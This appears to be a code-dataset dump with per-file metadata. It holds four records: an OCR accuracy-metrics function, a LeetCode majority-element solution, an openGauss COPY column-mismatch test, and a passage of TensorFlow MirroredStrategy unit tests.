- 1-N.E.D: 1 - normalized_edit_distance.
"""
assert isinstance(pred_texts, list)
assert isinstance(gt_texts, list)
assert len(pred_texts) == len(gt_texts)
match_res = count_matches(pred_texts, gt_texts)
eps = 1e-8
char_recall = 1.0 * match_res['true_positive_char_num'] / (
eps + match_res['gt_char_num'])
char_precision = 1.0 * match_res['true_positive_char_num'] / (
eps + match_res['pred_char_num'])
word_acc = 1.0 * match_res['match_word_num'] / (
eps + match_res['gt_word_num'])
word_acc_ignore_case = 1.0 * match_res['match_word_ignore_case'] / (
eps + match_res['gt_word_num'])
word_acc_ignore_case_symbol = 1.0 * match_res[
'match_word_ignore_case_symbol'] / (
eps + match_res['gt_word_num'])
eval_res = {}
eval_res['word_acc'] = word_acc
eval_res['word_acc_ignore_case'] = word_acc_ignore_case
eval_res['word_acc_ignore_case_symbol'] = word_acc_ignore_case_symbol
eval_res['char_recall'] = char_recall
eval_res['char_precision'] = char_precision
eval_res['1-N.E.D'] = 1.0 - match_res['ned']
eval_res['BLEU'] = match_res['bleu']
for key, value in eval_res.items():
eval_res[key] = float('{:.4f}'.format(value))
return eval_res
| 36.477707 | 79 | 0.632094 |
1d6c853f0410688dcc4549d1e659b2ceab243495 | 1,199 | py | Python | Easy/169. Majority Element/solution (5).py | czs108/LeetCode-Solutions | 889f5b6a573769ad077a6283c058ed925d52c9ec | [
"MIT"
] | 3 | 2020-05-09T12:55:09.000Z | 2022-03-11T18:56:05.000Z | Easy/169. Majority Element/solution (5).py | czs108/LeetCode-Solutions | 889f5b6a573769ad077a6283c058ed925d52c9ec | [
"MIT"
] | null | null | null | Easy/169. Majority Element/solution (5).py | czs108/LeetCode-Solutions | 889f5b6a573769ad077a6283c058ed925d52c9ec | [
"MIT"
] | 1 | 2022-03-11T18:56:16.000Z | 2022-03-11T18:56:16.000Z | # 169. Majority Element
# Runtime: 316 ms, faster than 5.22% of Python3 online submissions for Majority Element.
# Memory Usage: 15.4 MB, less than 7.14% of Python3 online submissions for Majority Element.
class Solution:
# Divide and Conquer
def majorityElement(self, nums: list[int]) -> int:
def majority_element(low: int, high: int) -> int:
# Base case; the only element in an array of size 1 is the majority element.
if low == high:
return nums[low]
# Recurse on left and right halves of this slice.
mid = (high - low) // 2 + low
left = majority_element(low, mid)
right = majority_element(mid + 1, high)
# If the two halves agree on the majority element, return it.
if left == right:
return left
# Otherwise, count each element and return the "winner".
left_count = sum(1 for i in range(low, high + 1) if nums[i] == left)
right_count = sum(1 for i in range(low, high + 1) if nums[i] == right)
return left if left_count > right_count else right
return majority_element(0, len(nums) - 1) | 37.46875 | 92 | 0.599666 |
40783d19fb80f53608704a606da1618ffa30a13f | 5,189 | py | Python | openGaussBase/testcase/SQL/DML/copy/Opengauss_Function_DML_Copy_Case0013.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | openGaussBase/testcase/SQL/DML/copy/Opengauss_Function_DML_Copy_Case0013.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | openGaussBase/testcase/SQL/DML/copy/Opengauss_Function_DML_Copy_Case0013.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | """
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 拷贝数据
Case Name : 表字段数少于文件表数据字段数时,是否会给出合理报错
Description :
1.创建测试表并插入数据
2.构造数据文件(多字段表)
3.从文件中拷贝数据到表(少字段表)
4.进行校验
Expect :
1.创建测试表并插入数据成功
2.构造数据文件(多字段表)成功
3.从文件中拷贝数据到表(少字段表),合理报错
4.进行校验
"""
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.CommonSH import *
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
logger = Logger()
class CopyFile(unittest.TestCase):
def setUp(self):
logger.info('----------------------------Opengauss_Function_DML_Copy_Case0013开始执行-----------------------------')
self.userNode = Node('PrimaryDbUser')
self.DB_ENV_PATH = macro.DB_ENV_PATH
self.DB_INSTANCE_PATH = macro.DB_INSTANCE_PATH
self.sh_primy = CommonSH('PrimaryDbUser')
self.Constant = Constant()
def test_copy_file(self):
logger.info('----------------------------创建测试表并插入数据-----------------------------')
sql_cmd = '''drop table if exists testzl;
CREATE TABLE testzl(SK INTEGER,ID CHAR(16),NAME VARCHAR(20),SQ_FT INTEGER);
insert into testzl values (001,'sk1','tt',3332);
insert into testzl values (001,'sk1','tt',3332);
insert into testzl values (001,'sk1','tt',3332);
drop table if exists testcopy;
CREATE TABLE testcopy(a INTEGER,b CHAR(16),c VARCHAR(20));
insert into testcopy values (001,'sk1','tt');
insert into testcopy values (001,'sk1','tt');
insert into testcopy values (001,'sk1','tt');
'''
excute_cmd = f'''
source {self.DB_ENV_PATH} ;
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertIn(self.Constant.INSERT_SUCCESS_MSG, msg)
logger.info('----------------------------构造数据文件-----------------------------')
sql_cmd = f'''copy testzl to '{self.DB_INSTANCE_PATH}/pg_copydir/testzl.dat';'''
excute_cmd = f'''mkdir {self.DB_INSTANCE_PATH}/pg_copydir;
touch {self.DB_INSTANCE_PATH}/pg_copydir/testzl.dat;
source {self.DB_ENV_PATH} ;
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertNotIn(self.Constant.SQL_WRONG_MSG[1], msg)
logger.info('--------------------------从文件中拷贝数据到表,失败---------------------------')
sql_cmd = f'''copy testcopy from '{self.DB_INSTANCE_PATH}/pg_copydir/testzl.dat';
select * from testcopy;'''
excute_cmd = f'''
source {self.DB_ENV_PATH} ;
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertIn(self.Constant.COPY_COLUMN_ERROR_MSG, msg)
logger.info('---------------------------进行校验---------------------------')
sql_cmd = f'''select count(*) from testcopy ;'''
excute_cmd = f'''
source {self.DB_ENV_PATH} ;
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
res = msg.splitlines()[-2].strip()
self.assertIn('3', res)
logger.info(res)
def tearDown(self):
logger.info('----------------------------清理环境-----------------------------')
sql_cmd = '''
drop table if exists testcopy;
drop table if exists testzl;'''
excute_cmd = f'''
rm -rf {self.DB_INSTANCE_PATH}/pg_copydir
source {self.DB_ENV_PATH} ;
gsql -d {self.userNode.db_name} -p {self.userNode.db_port} -c "{sql_cmd}"
'''
logger.info(excute_cmd)
msg = self.userNode.sh(excute_cmd).result()
logger.info(msg)
self.assertIn(self.Constant.TABLE_DROP_SUCCESS, msg)
logger.info('------------------Opengauss_Function_DML_Copy_Case0013执行完成-----------------------------')
| 42.186992 | 120 | 0.542494 |
25d9e55954f247f22c34f836b695731c6f3c13c2 | 57,725 | py | Python | tensorflow/python/distribute/mirrored_strategy_test.py | AdamHillier/tensorflow | 6780ebf4858a56fd0745f03fa5a61b249559f3cd | [
"Apache-2.0"
] | 2 | 2020-09-22T17:41:12.000Z | 2021-03-14T20:40:59.000Z | tensorflow/python/distribute/mirrored_strategy_test.py | AdamHillier/tensorflow | 6780ebf4858a56fd0745f03fa5a61b249559f3cd | [
"Apache-2.0"
] | 1 | 2021-03-23T03:25:15.000Z | 2021-03-23T03:25:15.000Z | tensorflow/python/distribute/mirrored_strategy_test.py | AdamHillier/tensorflow | 6780ebf4858a56fd0745f03fa5a61b249559f3cd | [
"Apache-2.0"
] | 2 | 2021-03-16T02:21:33.000Z | 2021-11-08T21:24:51.000Z | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MirroredStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import sys
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import tf2
from tensorflow.python.autograph.core import converter_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import distribution_strategy_context as ds_context
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import mirrored_strategy
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute import strategy_test_lib
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute import values
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as tf_device
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gradients
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.training import server_lib
GPU_TEST = "test_gpu" in sys.argv[0]
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
strategy_combinations.mirrored_strategy_with_two_gpus,
strategy_combinations.mirrored_strategy_with_two_gpus_no_merge_call,
],
mode=["graph", "eager"]))
class MirroredTwoDeviceDistributionTest(
strategy_test_lib.DistributionTestBase,
strategy_test_lib.TwoDeviceDistributionTestBase,
parameterized.TestCase):
def testMinimizeLoss(self, distribution):
if context.executing_eagerly():
self._test_minimize_loss_eager(distribution)
else:
self._test_minimize_loss_graph(distribution)
def testReplicaId(self, distribution):
self._test_replica_id(distribution)
def testNumReplicasInSync(self, distribution):
self.assertEqual(2, distribution.num_replicas_in_sync)
def testCallAndMergeExceptions(self, distribution):
self._test_call_and_merge_exceptions(distribution)
def testRunRegroupError(self, distribution):
if not getattr(distribution, "_use_merge_call", True):
self.skipTest("Collective all-reduce does not support int32 on GPU.")
def run_fn():
replica_id = int(self.evaluate(_replica_id()))
# Generates a list with different lengths on different devices.
# Will fail in _regroup() (if more than one device).
return list(range(replica_id))
with distribution.scope(), self.assertRaises(AssertionError):
distribution.extended.call_for_each_replica(run_fn)
def testReduceToCpu(self, distribution):
if not getattr(distribution, "_use_merge_call", True):
self.skipTest("Collective all-reduce does not support int32 on GPU.")
with distribution.scope():
result = distribution.extended.call_for_each_replica(_replica_id)
reduced = distribution.reduce(reduce_util.ReduceOp.SUM, result, axis=None)
expected = sum(range(distribution.num_replicas_in_sync))
self.assertEqual(expected, self.evaluate(reduced))
def testReduceToCpuNested(self, distribution):
if not getattr(distribution, "_use_merge_call", True):
self.skipTest("Collective all-reduce does not support int32 on GPU.")
with distribution.scope():
def replica_fn(input_tensor):
return input_tensor + constant_op.constant(
1.0), input_tensor - constant_op.constant(1.0)
input_tensor = constant_op.constant(3.0)
run_result = distribution.run(replica_fn, args=(input_tensor,))
reduced_result = distribution.reduce("SUM", run_result, axis=None)
expected_result = (4 * distribution.num_replicas_in_sync,
2 * distribution.num_replicas_in_sync)
self.assertEqual(expected_result, self.evaluate(reduced_result))
def reduce_axis_helper(self, distribution, replica_squared_fn):
with distribution.scope():
num_replicas = distribution.num_replicas_in_sync
result = distribution.extended.call_for_each_replica(replica_squared_fn)
# sum
reduced = distribution.reduce(reduce_util.ReduceOp.SUM, result, axis=0)
expected = sum(x * (x + 1) for x in range(num_replicas))
self.assertNear(expected, self.evaluate(reduced), 0.00001)
# mean
reduced = distribution.reduce(reduce_util.ReduceOp.MEAN, result, axis=0)
expected /= sum(x + 1 for x in range(num_replicas))
self.assertNear(expected, self.evaluate(reduced), 0.00001)
def testReduceAxisToCpu(self, distribution):
if not getattr(distribution, "_use_merge_call", True):
self.skipTest("Collective all-reduce does not support int32 on GPU.")
for dtype in (dtypes.float32, dtypes.int32):
def replica_squared_fn(dtype=dtype):
# Lists with different lengths on different replicas.
replica_id = _replica_id_as_int()
return array_ops.identity(
math_ops.cast([replica_id] * (replica_id + 1), dtype))
self.reduce_axis_helper(distribution, replica_squared_fn)
def set_v2_tensorshape(self, v2):
if v2:
tensor_shape.enable_v2_tensorshape()
else:
tensor_shape.disable_v2_tensorshape()
def testReduceAxisToCpuUnknownShape(self, distribution):
if not getattr(distribution, "_use_merge_call", True):
self.skipTest("Collective all-reduce does not support int32 on GPU.")
original_v2 = tensor_shape._TENSORSHAPE_V2_OVERRIDE # pylint: disable=protected-access
try:
for v2 in (False, True):
self.set_v2_tensorshape(v2)
for dtype in (dtypes.float32, dtypes.int32):
for shape in ((None,), None): # Test both unknown size and rank.
def replica_squared_fn(dtype=dtype, shape=shape):
# Lists with different lengths on different replicas.
replica_id = _replica_id_as_int()
tensor = math_ops.cast([replica_id] * (replica_id + 1), dtype)
# Erase shape information
return array_ops.placeholder_with_default(tensor, shape=shape)
self.reduce_axis_helper(distribution, replica_squared_fn)
finally:
self.set_v2_tensorshape(original_v2)
def testReplicateDataset(self, distribution):
if tf2.enabled() and not context.executing_eagerly():
self.skipTest("Skipping test since we do not support graph mode in TF 2")
dataset_fn = lambda: dataset_ops.Dataset.range(10)
expected_values = [[i, i+1] for i in range(0, 10, 2)]
input_fn = self._input_fn_to_test_input_context(
dataset_fn,
expected_num_replicas_in_sync=2,
expected_num_input_pipelines=1,
expected_input_pipeline_id=0)
self._test_input_fn_iterable(distribution, input_fn, expected_values)
def testMakeInputFnIteratorWithDataset(self, distribution):
dataset_fn = lambda: dataset_ops.Dataset.range(10)
expected_values = [[i, i+1] for i in range(0, 10, 2)]
input_fn = self._input_fn_to_test_input_context(
dataset_fn,
expected_num_replicas_in_sync=2,
expected_num_input_pipelines=1,
expected_input_pipeline_id=0)
iterator = distribution.make_input_fn_iterator(input_fn)
self._test_input_fn_iterator(iterator, distribution.extended.worker_devices,
expected_values)
def testMakeInputFnIteratorWithCallable(self, distribution):
def fn():
dataset = dataset_ops.Dataset.range(2).interleave(
(lambda _: dataset_ops.Dataset.range(10)), cycle_length=2)
it = dataset_ops.make_one_shot_iterator(dataset)
return it.get_next
expected_values = [[i, i] for i in range(0, 10)]
input_fn = self._input_fn_to_test_input_context(
fn,
expected_num_replicas_in_sync=2,
expected_num_input_pipelines=1,
expected_input_pipeline_id=0)
iterator = distribution.make_input_fn_iterator(input_fn)
self._test_input_fn_iterator(iterator, distribution.extended.worker_devices,
expected_values, test_reinitialize=False,
ignore_order=True)
def testNumpyDataset(self, distribution):
self._test_numpy_dataset(distribution)
def testGlobalStepUpdate(self, distribution):
self._test_global_step_update(distribution)
def testRun(self, distribution):
self._test_run(distribution)
def testAllReduceSum(self, distribution):
self._test_all_reduce_sum(distribution)
def testAllReduceSumGradients(self, distribution):
self._test_all_reduce_sum_gradients(distribution)
def testAllReduceSumGradientTape(self, distribution):
self._test_all_reduce_sum_gradient_tape(distribution)
def testAllReduceMean(self, distribution):
self._test_all_reduce_mean(distribution)
def testAllReduceMeanGradients(self, distribution):
self._test_all_reduce_mean_gradients(distribution)
def testAllReduceMeanGradientTape(self, distribution):
self._test_all_reduce_mean_gradient_tape(distribution)
def testSummaryForReplicaZeroOnly(self, distribution):
self._test_summary_for_replica_zero_only(distribution)
def testTrainableVariables(self, distribution):
self._test_trainable_variable(distribution)
def test_prefetch_to_device_dataset(self, distribution):
input_options = distribute_lib.InputOptions(
experimental_fetch_to_device=True)
dataset = dataset_ops.Dataset.range(100)
dataset = dataset.batch(distribution.num_replicas_in_sync)
dataset = distribution.experimental_distribute_dataset(
dataset, options=input_options)
if context.executing_eagerly():
item = next(iter(dataset))
else:
if isinstance(dataset, input_lib.DistributedDatasetV1):
item = dataset.make_initializable_iterator().get_next()
else:
self.skipTest("unsupported test combination")
device_types = [
tf_device.DeviceSpec.from_string(tensor.device).device_type for
tensor in item.values]
expected_device_types = [
tf_device.DeviceSpec.from_string(device).device_type for
device in distribution.extended.worker_devices]
self.assertAllEqual(device_types, expected_device_types)
def test_prefetch_to_host_dataset(self, distribution):
input_options = distribute_lib.InputOptions(
experimental_fetch_to_device=False)
dataset = dataset_ops.Dataset.range(100)
dataset = dataset.batch(distribution.num_replicas_in_sync)
dataset = distribution.experimental_distribute_dataset(
dataset, options=input_options)
if context.executing_eagerly():
item = next(iter(dataset))
else:
if isinstance(dataset, input_lib.DistributedDatasetV1):
item = dataset.make_initializable_iterator().get_next()
else:
self.skipTest("unsupported test combination")
device_types = {
tf_device.DeviceSpec.from_string(tensor.device).device_type for
tensor in item.values}
self.assertAllEqual(list(device_types), ["CPU"])
def one_device_combinations():
return combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_one_cpu,
strategy_combinations.mirrored_strategy_with_one_gpu,
],
mode=["graph", "eager"])
@combinations.generate(one_device_combinations())
class MirroredOneDeviceDistributionTest(
strategy_test_lib.DistributionTestBase,
strategy_test_lib.OneDeviceDistributionTestBase,
parameterized.TestCase):
def testMinimizeLoss(self, distribution):
if context.executing_eagerly():
self._test_minimize_loss_eager(distribution)
else:
self._test_minimize_loss_graph(distribution)
def testReplicaId(self, distribution):
self._test_replica_id(distribution)
def testCallAndMergeExceptions(self, distribution):
self._test_call_and_merge_exceptions(distribution)
def testRun(self, distribution):
self._test_run(distribution)
def testAllReduceSum(self, distribution):
self._test_all_reduce_sum(distribution)
def testAllReduceSumGradients(self, distribution):
self._test_all_reduce_sum_gradients(distribution)
def testAllReduceSumGradientTape(self, distribution):
self._test_all_reduce_sum_gradient_tape(distribution)
def testAllReduceMean(self, distribution):
self._test_all_reduce_mean(distribution)
def testAllReduceMeanGradients(self, distribution):
self._test_all_reduce_mean_gradients(distribution)
def testAllReduceMeanGradientTape(self, distribution):
self._test_all_reduce_mean_gradient_tape(distribution)
class MirroredStrategyVariableCreatorStackTest(
test.TestCase, parameterized.TestCase):
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
],
mode=["graph"]))
def testCreatorStacksAreThreadLocal(self, distribution):
def model_fn():
replica_id_str = str(self.evaluate(_replica_id()))
def thread_creator_fn(next_creator, **kwargs):
return next_creator(**kwargs) + ":thread_" + replica_id_str
with variable_scope.variable_creator_scope(thread_creator_fn):
# Create a variable in this scope.
v = variable_scope.variable(1.0)
# This will pause the current thread, and execute the other thread.
ds_context.get_replica_context().merge_call(lambda _: _)
return v
def main_thread_creator(next_creator, **kwargs):
# We are not using the underlying next_creator for test purposes.
del next_creator, kwargs
return "main_thread"
with context.graph_mode(), \
distribution.scope(), \
variable_scope.variable_creator_scope(main_thread_creator):
result = distribution.extended.call_for_each_replica(model_fn)
result = distribution.experimental_local_results(result)
expected = ("main_thread:thread_0", "main_thread:thread_1")
self.assertEqual(expected, result)
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
],
mode=["graph", "eager"]))
class MirroredStrategyCallForEachReplicaTest(test.TestCase):
def testExecutingEagerlyOutsideFunction(self, distribution):
"""Verify we preserve the value of executing_eagerly_outside_functions()."""
def model_fn():
return ops.executing_eagerly_outside_functions()
originally = ops.executing_eagerly_outside_functions()
with distribution.scope():
in_scope = ops.executing_eagerly_outside_functions()
in_model_fn = distribution.extended.call_for_each_replica(model_fn)
unwrapped = distribution.experimental_local_results(in_model_fn)
self.assertEqual(in_scope, unwrapped[0])
self.assertEqual(in_scope, originally)
# Verify this all again, but this time in a FuncGraph.
with func_graph.FuncGraph("fg").as_default(), distribution.scope():
in_scope = ops.executing_eagerly_outside_functions()
in_model_fn = distribution.extended.call_for_each_replica(model_fn)
unwrapped = distribution.experimental_local_results(in_model_fn)
self.assertEqual(in_scope, unwrapped[0])
self.assertEqual(in_scope, originally)
def testFunctionInCallForEachReplica(self, distribution):
traces = []
@def_function.function
def model_fn():
traces.append(1)
return ds_context.get_replica_context().replica_id_in_sync_group
with distribution.scope():
result = distribution.extended.call_for_each_replica(model_fn)
self.assertEqual(
(0, 1),
self.evaluate(distribution.experimental_local_results(result)))
self.assertLen(traces, distribution.num_replicas_in_sync)
def testFunctionInCallForEachReplicaInsideAnotherFunction(self, distribution):
traces = []
@def_function.function
def model_fn():
traces.append(1)
return ds_context.get_replica_context().replica_id_in_sync_group
@def_function.function
def step():
return distribution.extended.call_for_each_replica(model_fn)
with distribution.scope():
result = step()
self.assertEqual(
(0, 1),
self.evaluate(distribution.experimental_local_results(result)))
self.assertLen(traces, distribution.num_replicas_in_sync)
def testControlFlowFunctionInCallForEachReplicaWithMergeCall(
self, distribution):
def merge_fn(strategy, value):
return strategy.reduce(reduce_util.ReduceOp.SUM, value, axis=None)
@def_function.function
def model_fn():
def body_fn(i):
return ds_context.get_replica_context().merge_call(merge_fn, args=(i,))
return control_flow_ops.while_loop_v2(lambda i: i < 2, body_fn, [0])
with distribution.scope():
with self.assertRaisesRegex(
RuntimeError, "`merge_call` called while defining a new graph."):
distribution.extended.call_for_each_replica(model_fn)
def testNestedFunctionInCallForEachReplicaWithMergeCall(self, distribution):
def merge_fn(strategy, value):
return strategy.reduce(reduce_util.ReduceOp.SUM, value, axis=None)
def model_fn():
@def_function.function
def model_fn_nested():
t = constant_op.constant(1)
return ds_context.get_replica_context().merge_call(merge_fn, args=(t,))
return model_fn_nested()
with distribution.scope():
with self.assertRaisesRegex(
RuntimeError, "`merge_call` called while defining a new graph."):
distribution.extended.call_for_each_replica(model_fn)
def testFunctionInCallForEachReplicaWithMergeCall(self, distribution):
def merge_fn(_):
pass
@def_function.function
def model_fn():
ds_context.get_replica_context().merge_call(merge_fn)
return 0.
with distribution.scope():
self.assertEqual(
self.evaluate(distribution.extended.call_for_each_replica(model_fn)),
0.)
def testFunctionInCallForEachReplicaCached(self, distribution):
traces = []
@def_function.function
def model_fn():
traces.append(None)
self.assertEmpty(traces)
for i in range(10):
distribution.extended.call_for_each_replica(model_fn)
if i == 0:
num_devices = len(traces)
self.assertGreater(num_devices, 0)
else:
# model_fn should not have been re-evaluated so the length should remain
# the same.
self.assertLen(traces, num_devices)
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
],
mode=["graph"]))
class MirroredStrategyNameScopeTest(test.TestCase):
# NOTE(priyag): Names and name scopes are ignored in eager, hence we are not
# testing this in eager mode.
def testNameScope(self, distribution):
def model_fn():
with ops.name_scope("foo"):
a = constant_op.constant(1.0, name="a")
ds_context.get_replica_context().merge_call(lambda _: _)
b = constant_op.constant(1.0, name="b")
return a, b
with context.graph_mode(), distribution.scope():
with ops.name_scope("main"):
result = distribution.extended.call_for_each_replica(model_fn)
self.assertEqual(2, len(result))
for v, name in zip(result, ["a", "b"]):
self.assertIsInstance(v, values.DistributedValues)
v0, v1 = distribution.experimental_local_results(v)
self.assertEqual("main/foo/" + name + ":0", v0.name)
self.assertEqual("main/replica_1/foo/" + name + ":0", v1.name)
def testWithDefaultName(self, distribution):
def model_fn():
with ops.name_scope(None, "foo"):
a = constant_op.constant(1.0, name="a")
ds_context.get_replica_context().merge_call(lambda _: _)
b = constant_op.constant(2.0, name="b")
return a, b
with context.graph_mode(), distribution.scope():
result = distribution.extended.call_for_each_replica(model_fn)
self.assertEqual(2, len(result))
for v, name in zip(result, ["a", "b"]):
self.assertIsInstance(v, values.DistributedValues)
v0, v1 = distribution.experimental_local_results(v)
self.assertEqual("foo/" + name + ":0", v0.name)
self.assertEqual("replica_1/foo/" + name + ":0", v1.name)
# variable_scope.variable() respects name scopes when creating
# variables. On the other hand variable_scope.get_variable() ignores name
# scopes but respects variable scope when creating variables. We test both
# methods of creating variables to make sure that we have the same
# variable names in both cases.
def testNameScopeWithVariable(self, distribution):
def in_cross_replica(_):
c = variable_scope.variable(1.0, name="c")
return c
def model_fn():
b = variable_scope.variable(1.0, name="b")
with ops.name_scope("foo"):
c = ds_context.get_replica_context().merge_call(in_cross_replica)
return b, c
with context.graph_mode(), distribution.scope():
with ops.name_scope("main"):
a = variable_scope.variable(1.0, name="a")
result = distribution.extended.call_for_each_replica(model_fn)
result_b = result[0]
result_c = result[1]
self.assertIsInstance(result_b, values.DistributedValues)
self.assertIsInstance(result_c, values.DistributedValues)
a0, a1 = distribution.experimental_local_results(a)
b0, b1 = distribution.experimental_local_results(result_b)
c0, c1 = distribution.experimental_local_results(result_c)
self.assertEqual("main/a:0", a0.name)
self.assertEqual("main/a/replica_1:0", a1.name)
self.assertEqual("main/b:0", b0.name)
self.assertEqual("main/b/replica_1:0", b1.name)
self.assertEqual("main/foo/c:0", c0.name)
self.assertEqual("main/foo/c/replica_1:0", c1.name)
def testNameScopeWithGetVariable(self, distribution):
def in_cross_replica(_):
c = variable_scope.get_variable("c", [1])
return c
def model_fn():
b = variable_scope.get_variable("b", [1])
with ops.name_scope("foo"):
c = ds_context.get_replica_context().merge_call(in_cross_replica)
return b, c
with context.graph_mode(), distribution.scope():
with ops.name_scope("main"):
a = variable_scope.get_variable("a", [1])
result = distribution.extended.call_for_each_replica(model_fn)
result_b = result[0]
result_c = result[1]
self.assertIsInstance(result_b, values.DistributedValues)
self.assertIsInstance(result_c, values.DistributedValues)
a0, a1 = distribution.experimental_local_results(a)
b0, b1 = distribution.experimental_local_results(result_b)
c0, c1 = distribution.experimental_local_results(result_c)
self.assertEqual("a:0", a0.name)
self.assertEqual("a/replica_1:0", a1.name)
self.assertEqual("b:0", b0.name)
self.assertEqual("b/replica_1:0", b1.name)
self.assertEqual("c:0", c0.name)
self.assertEqual("c/replica_1:0", c1.name)
def testVariableScopeWithGetVariable(self, distribution):
def in_cross_replica(_):
c = variable_scope.get_variable("c", [1])
return c
def model_fn():
b = variable_scope.get_variable("b", [1])
with variable_scope.variable_scope("foo"):
c = ds_context.get_replica_context().merge_call(in_cross_replica)
return b, c
with context.graph_mode(), distribution.scope():
with variable_scope.variable_scope("main"):
a = variable_scope.get_variable("a", [1])
result = distribution.extended.call_for_each_replica(model_fn)
result_b = result[0]
result_c = result[1]
self.assertIsInstance(result_b, values.DistributedValues)
self.assertIsInstance(result_c, values.DistributedValues)
a0, a1 = distribution.experimental_local_results(a)
b0, b1 = distribution.experimental_local_results(result_b)
c0, c1 = distribution.experimental_local_results(result_c)
self.assertEqual("main/a:0", a0.name)
self.assertEqual("main/a/replica_1:0", a1.name)
self.assertEqual("main/b:0", b0.name)
self.assertEqual("main/b/replica_1:0", b1.name)
self.assertEqual("main/foo/c:0", c0.name)
self.assertEqual("main/foo/c/replica_1:0", c1.name)
@combinations.generate(
combinations.combine(
distribution=[
combinations.NamedDistribution(
"Mirrored3Devices",
# pylint: disable=g-long-lambda
lambda: mirrored_strategy.MirroredStrategy(
["/device:GPU:0", "/device:GPU:1", "/device:CPU:0"]),
required_gpus=2)
],
mode=["graph", "eager"]))
class MirroredThreeDeviceDistributionTest(
strategy_test_lib.DistributionTestBase,
parameterized.TestCase):
def testThreeDevices(self, distribution):
def model_fn():
v = variable_scope.variable(1.0, name="foo")
ds_context.get_replica_context().merge_call(lambda _: _)
return v
with distribution.scope():
result = distribution.extended.call_for_each_replica(model_fn)
self.assertTrue(distribute_utils.is_mirrored(result))
self.assertEqual("foo:0", result.name)
@combinations.generate(
combinations.combine(
distribution=[
strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
],
mode=["graph", "eager"]))
class MirroredVariableUpdateTest(test.TestCase):
# The following tests check assign, assign_add and assign_sub on Mirrored
# variables in replica and cross replica context.
def testAssignMirroredVarReplicaContextWithoutAggregationType(self,
distribution):
def var_fn():
v = variable_scope.variable(1.0, name="foo")
return v
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
def model_fn():
return mirrored_var.assign(5.0)
self.evaluate(distribution.experimental_local_results(
distribution.extended.call_for_each_replica(model_fn)))
self.assertEqual(5.0, self.evaluate(mirrored_var))
def testAssignMirroredVarReplicaContextWithSum(self, distribution):
# Test that we don't reduce a non-per-replica value with the "sum"
# aggregation type.
def var_fn():
v = variable_scope.variable(
1.0, name="foo", aggregation=variable_scope.VariableAggregation.SUM)
return v
with distribution.scope():
mirrored_var = distribution.extended.call_for_each_replica(var_fn)
self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
self.evaluate(variables.global_variables_initializer())
